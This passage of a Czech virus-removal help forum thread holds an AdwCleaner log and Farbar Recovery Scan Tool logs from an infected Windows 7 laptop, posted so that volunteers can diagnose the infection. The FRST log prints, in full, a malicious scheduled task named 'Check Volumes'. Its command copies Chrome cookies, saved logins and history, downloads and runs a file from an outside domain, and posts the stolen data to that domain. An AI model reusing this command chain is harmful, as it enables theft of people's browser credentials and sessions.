Deleted Preinstalled.ASUSLiveUpdate Registry HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\ASUS Live Update
Deleted Preinstalled.ASUSLiveUpdate Task C:\Windows\System32\Tasks\ASUS LIVE UPDATE
Deleted Preinstalled.ASUSSplendid Folder C:\Program Files (x86)\ASUS\SPLENDID
Deleted Preinstalled.ASUSSplendid Registry HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{9EA161CC-94DA-40D4-AD7B-00389FB1DC3C}
Deleted Preinstalled.ASUSSplendid Registry HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\ACMON
Deleted Preinstalled.ASUSSplendid Registry HKLM\Software\Wow6432Node\\Microsoft\Windows\CurrentVersion\Uninstall\{0969AF05-4FF6-4C00-9406-43599238DE0D}
Deleted Preinstalled.ASUSSplendid Task C:\Windows\System32\Tasks\ACMON
Deleted Preinstalled.ASUSVirtualCamera Folder C:\Program Files (x86)\ASUS\VIRTUALCAMERA
Deleted Preinstalled.ASUSVirtualCamera Registry HKLM\Software\Wow6432Node\\Microsoft\Windows\CurrentVersion\Uninstall\{EC8BD21F-0CA0-4BBF-97D9-4A52B30041A1}
Deleted Preinstalled.CyberLinkLabelPrint Folder C:\Program Files (x86)\CYBERLINK\LABELPRINT
Deleted Preinstalled.CyberLinkLabelPrint Registry HKLM\Software\Wow6432Node\\Microsoft\Windows\CurrentVersion\Run|UpdateLBPShortCut
Deleted Preinstalled.CyberLinkLabelPrint Registry HKLM\Software\Wow6432Node\\Microsoft\Windows\CurrentVersion\Uninstall\InstallShield_{C59C179C-668D-49A9-B6EA-0121CCFC1243}
Deleted Preinstalled.CyberLinkLabelPrint Registry HKLM\Software\Wow6432Node\\Microsoft\Windows\CurrentVersion\Uninstall\{C59C179C-668D-49A9-B6EA-0121CCFC1243}
Deleted Preinstalled.LenovoPower2Go Registry HKLM\Software\Wow6432Node\\Microsoft\Shared Tools\MSConfig\startupreg\CLMLServer
Deleted Preinstalled.LenovoPower2Go Registry HKLM\Software\Wow6432Node\\Microsoft\Windows\CurrentVersion\Run|UpdateP2GoShortCut
Deleted Preinstalled.LenovoPower2Go Registry HKLM\Software\Wow6432Node\\Microsoft\Windows\CurrentVersion\Uninstall\InstallShield_{40BF1E83-20EB-11D8-97C5-0009C5020658}
Deleted Preinstalled.LenovoPower2Go Registry HKLM\Software\Wow6432Node\\Microsoft\Windows\CurrentVersion\Uninstall\{40BF1E83-20EB-11D8-97C5-0009C5020658}


*************************

[+] Delete Tracing Keys
[+] Reset Winsock

*************************

AdwCleaner[S00].txt - [5170 octets] - [26/10/2021 17:59:00]

########## EOF - C:\AdwCleaner\Logs\AdwCleaner[C00].txt ##########

Uživatelský avatar
Rudy
Site Admin
Site Admin
Příspěvky: 118199
Registrován: 30 říj 2003 13:42
Bydliště: Plzeň
Kontaktovat uživatele:

Re: neplatné certifikaty v prohližečích

#5 Příspěvek od Rudy »

OK. Dejte nové logy FRST+Addition.
Dotazy a logy vkládejte pouze do vašich threadů. Soukromé zprávy, icq a e-maily neslouží k řešení vašich problémů.

Podpořte, prosím, naše fórum : https://platba.viry.cz/payment/.

Navštivte: Obrázek

e-mail: rudy(zavináč)forum.viry.cz

Varování:
Před odvirováním PC si udělejte zálohy svých důležitých dat (pošta, kontakty, dokumenty, fotografie, videa, hudba apod.). Virus mimo svých "viditelných" aktivit může poškodit systém!


Po dořešení vašeho problému bude vlákno zamknuto. Stejně tak tehdy, pokud bude nečinné více než 14dnů. Pokud budete chtít vlákno aktivovat, napište mi na mail uvedený výše.

Eddydye
Návštěvník
Návštěvník
Příspěvky: 16
Registrován: 27 kvě 2021 16:55

Re: neplatné certifikaty v prohližečích

#6 Příspěvek od Eddydye »

Scan result of Farbar Recovery Scan Tool (FRST) (x64) Version: 20-10-2021
Ran by PC (administrator) on PC-PC (ASUSTeK Computer Inc. K50IJ) (26-10-2021 19:54:24)
Running from C:\Users\PC\Desktop
Loaded Profiles: PC
Platform: Microsoft Windows 7 Home Premium (X64) Language: Čeština (Česká republika)
Default browser: IE
Boot Mode: Normal

==================== Processes (Whitelisted) =================

(If an entry is included in the fixlist, the process will be closed. The file will not be moved.)

() [File not signed] C:\Program Files (x86)\ASUS\Wireless Console 3\wcourier.exe
() [File not signed] C:\Program Files\ATKGFNEX\GFNEXSrv.exe
() [File not signed] C:\ProgramData\SoundFlowPicker\SoundFlowPicker.exe
(AlcorMicro Co., Ltd.) [File not signed] C:\Program Files (x86)\AmIcoSingLun\AmIcoSinglun64.exe
(ASUS) [File not signed] C:\Program Files (x86)\ASUS\ATK Media\DMedia.exe
(ASUSTeK Computer Inc. -> ) C:\Program Files (x86)\ASUS\ATK Hotkey\Atouch64.exe
(ASUSTeK Computer Inc. -> ASUS) C:\Program Files (x86)\ASUS\ASUS CopyProtect\ASPG.exe
(ASUSTeK Computer Inc. -> ASUS) C:\Program Files (x86)\ASUS\ATK Hotkey\AsLdrSrv.exe
(ASUSTeK Computer Inc. -> ASUS) C:\Program Files (x86)\ASUS\ATK Hotkey\ATKOSD.exe
(ASUSTeK Computer Inc. -> ASUS) C:\Program Files (x86)\ASUS\ATK Hotkey\HControl.exe
(ASUSTeK Computer Inc. -> ASUS) C:\Program Files (x86)\ASUS\ATK Hotkey\HControlUser.exe
(ASUSTeK Computer Inc. -> ASUS) C:\Program Files (x86)\ASUS\ATK Hotkey\KBFiltr.exe
(ASUSTeK Computer Inc. -> ASUS) C:\Program Files (x86)\ASUS\ATK Hotkey\WDC.exe
(ASUSTeK Computer Inc. -> ASUS) C:\Program Files (x86)\ASUS\ATKOSD2\ATKOSD2.exe
(ASUSTeK Computer Inc. -> ASUS) C:\Program Files (x86)\ASUS\SmartLogon\sensorsrv.exe
(ASUSTeK Computer Inc. -> ASUS) C:\Program Files (x86)\ASUS\SmartLogon\smartlogon.exe
(ASUSTeK Computer Inc. -> ASUS) C:\Windows\AsScrPro.exe
(ASUSTeK Computer Inc. -> ASUSTeK Computer Inc.) C:\Windows\System32\FBAgent.exe
(ASUSTeK Computer Inc. -> ASUSTeK Computer Inc.) C:\Windows\SysWOW64\Fast Boot\FastBootAgent.exe
(ASUSTeK Computer Inc. -> ATK) C:\Program Files\P4G\BatteryLife.exe
(ELAN Microelectronics Corporation -> ELAN Microelectronic Corp.) C:\Program Files\Elantech\ETDCtrl.exe
(Google LLC -> Google LLC) C:\Program Files (x86)\Google\Update\1.3.36.112\GoogleCrashHandler.exe
(Google LLC -> Google LLC) C:\Program Files (x86)\Google\Update\1.3.36.112\GoogleCrashHandler64.exe
(Google LLC -> Google LLC) C:\Users\PC\AppData\Local\Google\Update\1.3.36.112\GoogleCrashHandler.exe
(Google LLC -> Google LLC) C:\Users\PC\AppData\Local\Google\Update\1.3.36.112\GoogleCrashHandler64.exe
(Intel Corporation -> Intel Corporation) C:\Windows\System32\hkcmd.exe
(Intel Corporation -> Intel Corporation) C:\Windows\System32\igfxpers.exe
(Intel Corporation -> Intel Corporation) C:\Windows\System32\igfxsrvc.exe
(Intel Corporation -> Intel Corporation) C:\Windows\System32\igfxtray.exe
(Microsoft Corporation -> Microsoft Corp.) C:\Program Files (x86)\Microsoft\Search Enhancement Pack\SeaPort\SeaPort.exe
(Microsoft Windows -> Microsoft Corporation) C:\Program Files\Windows Defender\MpCmdRun.exe
(Microsoft Windows -> Microsoft Corporation) C:\Windows\System32\rundll32.exe
(Trend Micro, Inc. -> Trend Micro Inc.) C:\Program Files\Trend Micro\BM\TMBMSRV.exe
(Trend Micro, Inc. -> Trend Micro Inc.) C:\Program Files\Trend Micro\Internet Security\SfCtlCom.exe
(Trend Micro, Inc. -> Trend Micro Inc.) C:\Program Files\Trend Micro\Internet Security\TmProxy.exe
(Trend Micro, Inc. -> Trend Micro Inc.) C:\Program Files\Trend Micro\Internet Security\UfSeAgnt.exe
(VIA) [File not signed] C:\Program Files (x86)\VIA\VIAudioi\VDeck\VDECK.EXE

==================== Registry (Whitelisted) ===================

(If an entry is included in the fixlist, the registry item will be restored to default or removed. The file will not be moved.)

HKLM\...\Run: [UfSeAgnt.exe] => C:\Program Files\Trend Micro\Internet Security\UfSeAgnt.exe [1022368 2009-08-22] (Trend Micro, Inc. -> Trend Micro Inc.)
HKLM\...\Run: [AmIcoSinglun64] => C:\Program Files (x86)\AmIcoSingLun\AmIcoSinglun64.exe [320000 2009-04-09] (AlcorMicro Co., Ltd.) [File not signed]
HKLM\...\Run: [ETDWare] => C:\Program Files\Elantech\ETDCtrl.exe [619392 2009-06-12] (ELAN Microelectronics Corporation -> ELAN Microelectronic Corp.)
HKLM-x32\...\Run: [HDAudDeck] => C:\Program Files (x86)\VIA\VIAudioi\VDeck\VDeck.exe [2244096 2009-07-13] (VIA) [File not signed]
HKLM-x32\...\Run: [HControlUser] => C:\Program Files (x86)\ASUS\ATK Hotkey\HControlUser.exe [105016 2009-06-19] (ASUSTeK Computer Inc. -> ASUS)
HKLM-x32\...\Run: [ATKOSD2] => C:\Program Files (x86)\ASUS\ATKOSD2\ATKOSD2.exe [8493624 2009-07-07] (ASUSTeK Computer Inc. -> ASUS)
HKLM-x32\...\Run: [ATKMEDIA] => C:\Program Files (x86)\ASUS\ATK Media\DMedia.exe [159744 2009-04-20] (ASUS) [File not signed]
HKLM-x32\...\Run: [Setwallpaper] => c:\programdata\SetWallpaper.cmd
HKLM-x32\...\Run: [GrooveMonitor] => C:\Program Files (x86)\Microsoft Office\Office12\GrooveMonitor.exe [31016 2006-10-27] (Microsoft Corporation -> Microsoft Corporation)
HKU\S-1-5-21-1878501408-2484808434-785971923-1000\...\Run: [Google Update] => C:\Users\PC\AppData\Local\Google\Update\1.3.36.112\GoogleUpdateCore.exe [223816 2021-10-11] (Google LLC -> Google LLC)
HKLM\...\Windows x64\Print Processors\Canon MP250 series Print Processor: C:\Windows\System32\spool\prtprocs\x64\CNMPD9W.DLL [28672 2010-04-24] (Microsoft Windows Hardware Compatibility Publisher -> CANON INC.)
HKLM\...\Print\Monitors\Canon BJ Language Monitor MP250 series: C:\Windows\system32\CNMLM9W.DLL [336896 2010-04-24] (Microsoft Windows Hardware Compatibility Publisher -> CANON INC.)
HKLM\Software\Microsoft\Active Setup\Installed Components: [{8A69D345-D564-463c-AFF1-A69D9E530F96}] -> C:\Program Files\Google\Chrome\Application\95.0.4638.54\Installer\chrmstp.exe [2021-10-25] (Google LLC -> Google LLC) [File not signed]
HKLM\Software\...\Authentication\Credential Providers: [{06FE45A8-6D92-44ba-A0F1-9A9BCDC8F5A7}] -> C:\Program Files (x86)\ASUS\SmartLogon\system\FaceCredentialProvider64.dll [2009-05-01] (ASUS) [File not signed]
Startup: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\FancyStart daemon.lnk [2009-10-06]
ShortcutTarget: FancyStart daemon.lnk -> C:\Windows\Installer\{60D6618B-153F-4353-8185-908E676E5888}\_DCE9A4DB2A5F2786140FA3.exe () [File not signed]
Startup: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\tmchlang.lnk [2009-10-06]
ShortcutTarget: tmchlang.lnk -> C:\Program Files\Trend Micro\Internet Security\TmChLang.exe (Trend Micro, Inc. -> Trend Micro Inc.)
HKLM\SOFTWARE\Policies\Google: Restriction <==== ATTENTION

==================== Scheduled Tasks (Whitelisted) ============

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)

Task: {2C093763-EE42-49CF-8891-F189A4AB542C} - System32\Tasks\GoogleUpdateTaskUserS-1-5-21-1878501408-2484808434-785971923-1000Core => C:\Users\PC\AppData\Local\Google\Update\GoogleUpdate.exe [154440 2021-02-16] (Google LLC -> Google LLC)
Task: {326F35B1-9030-43D1-BD0D-5DBD49CECAFF} - System32\Tasks\GoogleUpdateTaskMachineCore => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [156232 2021-10-25] (Google LLC -> Google LLC)
Task: {3BA45A0D-24F6-4688-84BE-D1EA203FDFE0} - System32\Tasks\WC3 => C:\Program Files (x86)\ASUS\Wireless Console 3\wcourier.exe [1593344 2009-07-24] () [File not signed]
Task: {4CDF81D0-F7E2-48C8-817A-A530B90DD8DF} - System32\Tasks\Microsoft Windows Defender Update => C:\Program Files (x86)\Rezhabeck\mp3RenamerPro\mp3RenamerPro.exe
Task: {6E64456A-0201-4D80-BB77-5184B428C4FA} - System32\Tasks\Check Volumes => C:\Windows\SYSTEM32\CMD.EXE /C copy /Y /B "C:\Users\PC\AppData\Local\Google\Chrome\User Data\Default\Cookies" "C:\Users\PC\AppData\Local\Temp\DYY04N8UKN" > NUL && copy /Y /B "C:\Users\PC\AppData\Local\Google\Chrome\User Data\Default\Login Data" "C:\Users\PC\AppData\Local\Temp\1Q541DFWIX" > NUL && copy /Y /B "C:\Users\PC\AppData\Local\Google\Chrome\User Data\Local State" "C:\Users\PC\AppData\Local\Temp\OEROW4YA69" > NUL && "C:\Users\PC\AppData\Local\Temp\OR0HXXB6JC.exe" http://1oivviovidwopopin.info/f2/OSJPN1IXJW.exe -s -k -o "C:\Users\PC\AppData\Local\Temp\OSJPN1IXJW.exe" && cd C:\Users\PC\AppData\Local\Temp\ && "OSJPN1IXJW.exe" V04J2WGO4Hf2 DYY04N8UKN 1Q541DFWIX OEROW4YA69 & copy /Y /B "C:\Users\PC\AppData\Local\Google\Chrome\User Data\Default\History" "C:\Users\PC\AppData\Local\Temp\J1O2156BEB" > NUL && cd C:\Users\PC\AppData\Local\Temp\ && "C:\Users\PC\AppData\Local\Temp\OR0HXXB6JC.exe" -X POST -H "Content-type: application/octet-stream" --data @J1O2156BEB http://1oivviovidwopopin.info/h -> /C copy /Y /B "C:\Users\PC\AppData\Local\Google\Chrome\User Data\Default\Cookies" "C:\Users\PC\AppData\Local\Temp\DYY04N8UKN" > NUL && copy /Y /B "C:\Users\PC\AppData\Local\Google\Chrome\User Data\Default\Login Data" "C:\Users\PC\AppData\Local\Temp\1Q541DFWIX" > NUL && copy /Y /B "C:\Users\PC\AppDa (the data entry has 678 more characters). <==== ATTENTION
Task: {74344F07-42C6-4622-9312-152A6B0AECFF} - System32\Tasks\GoogleUpdateTaskUserS-1-5-21-1878501408-2484808434-785971923-1000UA => C:\Users\PC\AppData\Local\Google\Update\GoogleUpdate.exe [154440 2021-02-16] (Google LLC -> Google LLC)
Task: {7A61CC45-675A-42D9-BC0A-D3691F5842ED} - System32\Tasks\ASUS SmartLogon Console Sensor => C:\Program Files (x86)\ASUS\SmartLogon\sensorsrv.exe [305720 2009-05-19] (ASUSTeK Computer Inc. -> ASUS)
Task: {CA21A731-91AF-4714-8E6F-CFE619DD08A0} - System32\Tasks\Games\UpdateCheck_S-1-5-21-1878501408-2484808434-785971923-1000 => {CA22F5B1-E06F-4A2B-94FC-21E87FE53781} C:\Windows\System32\gameux.dll [2746368 2009-07-14] (Microsoft Windows -> Microsoft Corporation)
Task: {E24D73D5-BC2A-4F11-90B0-83E312366154} - System32\Tasks\ASUS P4G => C:\Program Files\P4G\BatteryLife.exe [267832 2009-07-29] (ASUSTeK Computer Inc. -> ATK)
Task: {F53D1F2C-4DBF-4EB4-9E7F-45350BE21FBF} - System32\Tasks\ASPG => C:\Program Files (x86)\ASUS\ASUS CopyProtect\aspg.exe [163384 2009-06-29] (ASUSTeK Computer Inc. -> ASUS)
Task: {FF6375C1-1AC9-466C-80D7-F1443D3F6986} - System32\Tasks\GoogleUpdateTaskMachineUA => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [156232 2021-10-25] (Google LLC -> Google LLC)

(If an entry is included in the fixlist, the task (.job) file will be moved. The file which is running by the task will not be moved.)


==================== Internet (Whitelisted) ====================

(If an item is included in the fixlist, if it is a registry item it will be removed or restored to default.)

Tcpip\Parameters: [DhcpNameServer] 78.157.167.7 78.157.167.57
Tcpip\..\Interfaces\{6FBAB886-4307-4726-B9CB-F48F3A217E2B}: [DhcpNameServer] 78.157.167.7 78.157.167.57

FireFox:
========
FF Plugin-x32: @adobe.com/FlashPlayer -> C:\Windows\system32\Macromed\Flash\NPSWF32.dll [No File]
FF Plugin-x32: @microsoft.com/OfficeLive,version=1.3 -> C:\Program Files (x86)\Microsoft\Office Live\npOLW.dll [2008-11-13] (Microsoft Corporation -> Microsoft Corp.)
FF Plugin-x32: @microsoft.com/WLPG,version=14.0.8051.1204 -> C:\Program Files (x86)\Windows Live\Photo Gallery\NPWLPG.dll [2008-12-04] (Microsoft Corporation -> Microsoft Corporation)

Chrome:
=======
CHR Profile: C:\Users\PC\AppData\Local\Google\Chrome\User Data\Default [2021-10-26]
CHR Notifications: Default -> hxxps//tadesco.org
CHR Extension: (Prezentace) - C:\Users\PC\AppData\Local\Google\Chrome\User Data\Default\Extensions\aapocclcgogkmnckokdopfmhonfmgoek [2021-01-03]
CHR Extension: (Dokumenty) - C:\Users\PC\AppData\Local\Google\Chrome\User Data\Default\Extensions\aohghmighlieiainnegkcijnfilokake [2021-01-03]
CHR Extension: (Disk Google) - C:\Users\PC\AppData\Local\Google\Chrome\User Data\Default\Extensions\apdfllckaahabafndbhieahigkjlhalf [2021-01-03]
CHR Extension: (YouTube) - C:\Users\PC\AppData\Local\Google\Chrome\User Data\Default\Extensions\blpcfgokakmgnkcojhhkbfbldkacnbeo [2021-01-03]
CHR Extension: (Tabulky) - C:\Users\PC\AppData\Local\Google\Chrome\User Data\Default\Extensions\felcaaldnbdncclmgdcncolpebgiejap [2021-01-03]
CHR Extension: (Dokumenty Google offline) - C:\Users\PC\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi [2021-10-25]
CHR Extension: (Platby Internetového obchodu Chrome) - C:\Users\PC\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda [2021-01-29]
CHR Extension: (Gmail) - C:\Users\PC\AppData\Local\Google\Chrome\User Data\Default\Extensions\pjkljhegncpnkpknbcohdijeoejaedia [2021-01-03]

==================== Services (Whitelisted) ===================

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)

R2 ATKGFNEXSrv; C:\Program Files\ATKGFNEX\GFNEXSrv.exe [94208 2007-08-08] () [File not signed]
R2 FastBootAgent; C:\Windows\SysWOW64\Fast Boot\FastBootAgent.exe [306232 2009-07-24] (ASUSTeK Computer Inc. -> ASUSTeK Computer Inc.)
S3 GoogleChromeElevationService; C:\Program Files\Google\Chrome\Application\95.0.4638.54\elevation_service.exe [1480024 2021-10-16] (Google LLC -> Google LLC) [File not signed]
R2 SfCtlCom; C:\Program Files\Trend Micro\Internet Security\SfCtlCom.exe [838528 2009-08-22] (Trend Micro, Inc. -> Trend Micro Inc.)
R2 SoundFlowPicker; C:\ProgramData\SoundFlowPicker\SoundFlowPicker.exe [1064960 2021-07-05] () [File not signed] <==== ATTENTION
R3 TMBMServer; C:\Program Files\Trend Micro\BM\TMBMSRV.exe [570632 2009-08-22] (Trend Micro, Inc. -> Trend Micro Inc.)
R3 TmProxy; C:\Program Files\Trend Micro\Internet Security\TmProxy.exe [917768 2009-08-22] (Trend Micro, Inc. -> Trend Micro Inc.)
R2 WinDefend; C:\Program Files\Windows Defender\mpsvc.dll [1011712 2009-07-14] (Microsoft Windows -> Microsoft Corporation)

===================== Drivers (Whitelisted) ===================

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)

R2 ASMMAP64; C:\Program Files\ATKGFNEX\ASMMAP64.sys [14904 2007-07-24] (ASUSTeK Computer Inc. -> )
R3 athr; C:\Windows\System32\DRIVERS\athrx.sys [1394688 2009-06-20] (Microsoft Windows -> Atheros Communications, Inc.)
R3 ETD; C:\Windows\System32\DRIVERS\ETD.sys [112128 2009-06-12] (Microsoft Windows Hardware Compatibility Publisher -> ELAN Microelectronic Corp.)
R3 kbfiltr; C:\Windows\System32\DRIVERS\kbfiltr.sys [15416 2009-07-20] (ASUSTeK Computer Inc. -> )
R3 L1E; C:\Windows\System32\DRIVERS\L1E62x64.sys [55296 2009-06-09] (Microsoft Windows Hardware Compatibility Publisher -> Atheros Communications, Inc.)
R0 lullaby; C:\Windows\System32\DRIVERS\lullaby.sys [15928 2009-06-18] (ASUSTeK Computer Inc. -> Windows (R) Win 7 DDK provider)
R3 SNP2UVC; C:\Windows\System32\DRIVERS\snp2uvc.sys [1806400 2009-06-05] (SONIX TECHNOLOGY CO. , LTD -> )
R3 tmpreflt; C:\Windows\System32\DRIVERS\tmpreflt.sys [42000 2009-08-22] (Trend Micro, Inc. -> Trend Micro Inc.)
R1 tmtdi; C:\Windows\System32\DRIVERS\tmtdi.sys [107536 2009-08-22] (Trend Micro, Inc. -> Trend Micro Inc.)
R3 tmxpflt; C:\Windows\System32\DRIVERS\tmxpflt.sys [258064 2009-08-22] (Trend Micro, Inc. -> Trend Micro Inc.)
R3 vsapint; C:\Windows\System32\DRIVERS\vsapint.sys [1883152 2009-08-22] (Trend Micro, Inc. -> Trend Micro Inc.)
U3 tmlwf; no ImagePath
U3 tmwfp; no ImagePath

==================== NetSvcs (Whitelisted) ===================

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)


==================== One month (created) (Whitelisted) =========

(If an entry is included in the fixlist, the file/folder will be moved.)

2021-10-26 17:58 - 2021-10-26 18:00 - 000000000 ____D C:\AdwCleaner
2021-10-26 17:57 - 2021-10-26 17:57 - 008553680 _____ (Malwarebytes) C:\Users\PC\Desktop\AdwCleaner.exe
2021-10-26 16:52 - 2021-10-26 17:02 - 000028575 _____ C:\Users\PC\Desktop\Addition.txt
2021-10-26 16:47 - 2021-10-26 19:55 - 000015741 _____ C:\Users\PC\Desktop\FRST.txt
2021-10-26 16:47 - 2021-10-26 19:54 - 000000000 ____D C:\FRST
2021-10-26 16:42 - 2021-10-26 16:42 - 002310656 _____ (Farbar) C:\Users\PC\Desktop\FRST64.exe
2021-10-25 16:56 - 2021-10-25 16:56 - 000002244 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Google Chrome.lnk
2021-10-25 16:56 - 2021-10-25 16:56 - 000002203 _____ C:\Users\Public\Desktop\Google Chrome.lnk
2021-10-25 16:55 - 2021-10-25 16:55 - 000003388 _____ C:\Windows\system32\Tasks\GoogleUpdateTaskMachineUA
2021-10-25 16:55 - 2021-10-25 16:55 - 000003260 _____ C:\Windows\system32\Tasks\GoogleUpdateTaskMachineCore
2021-10-11 16:33 - 2021-10-11 16:33 - 001341272 _____ (Google LLC) C:\Users\PC\Downloads\ChromeSetup.exe

==================== One month (modified) ==================

(If an entry is included in the fixlist, the file/folder will be moved.)

2021-10-26 19:57 - 2021-08-05 15:40 - 000000824 _____ C:\Windows\system32\Drivers\etc\tmvsthfud.bin
2021-10-26 19:57 - 2021-08-05 15:40 - 000000824 _____ C:\Windows\system32\Drivers\etc\tmvsthfss.bin
2021-10-26 19:57 - 2021-07-13 16:04 - 000000004 _____ C:\ProgramData\rc.dat
2021-10-26 19:12 - 2021-07-13 16:03 - 000000004 _____ C:\ProgramData\lock.dat
2021-10-26 19:03 - 2009-07-14 06:45 - 000010016 ____H C:\Windows\system32\7B296FB0-376B-497e-B012-9C450E1B7327-5P-1.C7483456-A289-439d-8115-601632D005A0
2021-10-26 19:03 - 2009-07-14 06:45 - 000010016 ____H C:\Windows\system32\7B296FB0-376B-497e-B012-9C450E1B7327-5P-0.C7483456-A289-439d-8115-601632D005A0
2021-10-26 19:00 - 2021-01-03 19:43 - 000000000 ____D C:\Program Files (x86)\Google
2021-10-26 18:57 - 2021-07-13 16:03 - 000000060 _____ C:\ProgramData\lir.bats
2021-10-26 18:55 - 2009-07-14 07:08 - 000000006 ____H C:\Windows\Tasks\SA.DAT
2021-10-26 18:00 - 2009-10-06 11:32 - 000000000 ____D C:\Program Files (x86)\ASUS
2021-10-26 18:00 - 2009-10-06 11:16 - 000000000 ____D C:\Program Files (x86)\CyberLink
2021-10-26 17:51 - 2021-02-16 16:18 - 000002403 _____ C:\Users\PC\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Google Chrome.lnk
2021-10-26 17:51 - 2021-02-16 16:18 - 000002366 _____ C:\Users\PC\Desktop\Google Chrome.lnk
2021-10-26 16:38 - 2009-07-14 05:20 - 000000000 ____D C:\Windows\system32\NDF
2021-10-25 17:06 - 2009-10-06 11:35 - 000001145 _____ C:\Windows\system32\ServiceFilter.ini
2021-10-11 16:05 - 2021-02-16 16:16 - 000003558 _____ C:\Windows\system32\Tasks\GoogleUpdateTaskUserS-1-5-21-1878501408-2484808434-785971923-1000UA
2021-10-11 16:05 - 2021-02-16 16:16 - 000003286 _____ C:\Windows\system32\Tasks\GoogleUpdateTaskUserS-1-5-21-1878501408-2484808434-785971923-1000Core

==================== Files in the root of some directories ========

2021-07-13 16:03 - 2021-10-26 19:12 - 000000004 _____ () C:\ProgramData\lock.dat
2021-07-13 16:04 - 2021-10-26 19:57 - 000000004 _____ () C:\ProgramData\rc.dat
2021-07-13 16:03 - 2021-07-13 16:03 - 000000008 _____ () C:\ProgramData\ts.dat
2007-06-12 18:34 - 2007-06-12 18:34 - 000035822 _____ () C:\Program Files (x86)\Common Files\ASPG_icon.ico
2008-05-22 17:35 - 2008-05-22 17:35 - 000051962 _____ () C:\Program Files (x86)\Common Files\banner.jpg
2009-04-08 19:31 - 2009-04-08 19:31 - 000106496 _____ () C:\Program Files (x86)\Common Files\CPInstallAction.dll
2008-08-12 06:45 - 2008-08-12 06:45 - 000155648 _____ (ASUS) C:\Program Files (x86)\Common Files\MSIactionall.dll

==================== SigCheck ============================

(There is no automatic fix for files that do not pass verification.)


LastRegBack: 2021-03-31 16:37
==================== End of FRST.txt ========================


Additional scan result of Farbar Recovery Scan Tool (x64) Version: 20-10-2021
Ran by PC (26-10-2021 19:58:06)
Running from C:\Users\PC\Desktop
Microsoft Windows 7 Home Premium (X64) (2021-01-03 17:28:21)
Boot Mode: Normal
==========================================================


==================== Accounts: =============================


(If an entry is included in the fixlist, it will be removed.)

Administrator (S-1-5-21-1878501408-2484808434-785971923-500 - Administrator - Disabled)
Guest (S-1-5-21-1878501408-2484808434-785971923-501 - Limited - Disabled)
HomeGroupUser$ (S-1-5-21-1878501408-2484808434-785971923-1002 - Limited - Enabled)
PC (S-1-5-21-1878501408-2484808434-785971923-1000 - Administrator - Enabled) => C:\Users\PC

==================== Security Center ========================

(If an entry is included in the fixlist, it will be removed.)

AV: Trend Micro Internet Security (Enabled - Up to date) {48929DFC-7A52-A34F-8351-C4DBEDBD9C50}
AS: Trend Micro Internet Security (Enabled - Up to date) {F3F37C18-5C68-ACC1-B9E1-FFA9963AD6ED}
AS: Windows Defender (Enabled - Out of date) {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}

==================== Installed Programs ======================

(Only the adware programs with "Hidden" flag could be added to the fixlist to unhide them. The adware programs should be uninstalled manually.)

Acrobat.com (HKLM-x32\...\{287ECFA4-719A-2143-A09B-D6A12DE54E40}) (Version: 1.6.65 - Adobe Systems Incorporated)
Activation Assistant for the 2007 Microsoft Office suites (HKLM-x32\...\Activation Assistant for the 2007 Microsoft Office suites) (Version: - Microsoft Corporation)
Adobe AIR (HKLM-x32\...\Adobe AIR) (Version: 1.5.0.7220 - Adobe Systems Inc.)
Adobe Flash Player 10 ActiveX (HKLM-x32\...\Adobe Flash Player ActiveX) (Version: 10.0.32.18 - Adobe Systems Incorporated)
Adobe Flash Player 10 Plugin (HKLM-x32\...\Adobe Flash Player Plugin) (Version: 10.0.32.18 - Adobe Systems Incorporated)
Adobe Reader 9.1 MUI (HKLM-x32\...\{AC76BA86-7AD7-FFFF-7B44-A91000000001}) (Version: 9.1.0 - Adobe Systems Incorporated)
Alcor Micro USB Card Reader (HKLM-x32\...\InstallShield_{5A22D889-FBDD-4AE8-86EC-089D45FC133E}) (Version: 1.2.17.25001 - Alcor Micro Corp.)
Asistent pro přihlášení ke službě Windows Live (HKLM-x32\...\{1E779810-ACCA-4483-BC76-12DFE055B452}) (Version: 5.000.817.1 - Microsoft Corporation)
ASUS AI Recovery (HKLM-x32\...\{06585B02-F20D-4AB2-9A64-86EF2AE0F8F0}) (Version: 1.0.6 - ASUS)
ASUS CopyProtect (HKLM-x32\...\{6B77A7F6-DD63-4F13-A6FF-83137A5AC354}) (Version: 1.0.0015 - ASUS)
ASUS FancyStart (HKLM-x32\...\{60D6618B-153F-4353-8185-908E676E5888}) (Version: 1.0.5 - ASUSTeK Computer Inc.)
ASUS LifeFrame3 (HKLM-x32\...\{1DBD1F12-ED93-49C0-A7CC-56CBDE488158}) (Version: 3.0.20 - ASUS)
ASUS Live Update (HKLM-x32\...\{E657B243-9AD4-4ECC-BE81-4CCF8D667FD0}) (Version: 2.5.9 - ASUS)
ASUS MultiFrame (HKLM-x32\...\{9D48531D-2135-49FC-BC29-ACCDA5396A76}) (Version: 1.0.0019 - ASUS)
ASUS Power4Gear Hybrid (HKLM\...\{1686C4D1-B1FD-42E8-B7A8-FB4C4DBA5BA8}) (Version: 1.1.19 - ASUS)
ASUS SmartLogon (HKLM-x32\...\{64452561-169F-4A36-A2FF-B5E118EC65F5}) (Version: 1.0.0007 - ASUS)
Asus_Camera_ScreenSaver (HKLM-x32\...\Asus_Camera_ScreenSaver) (Version: 2.0.0009 - ASUS)
Atheros Communications Inc.(R) AR8121/AR8113/AR8114 Gigabit/Fast Ethernet Driver (HKLM-x32\...\{3108C217-BE83-42E4-AE9E-A56A2A92E549}) (Version: 1.0.0.16 - Atheros Communications Inc.)
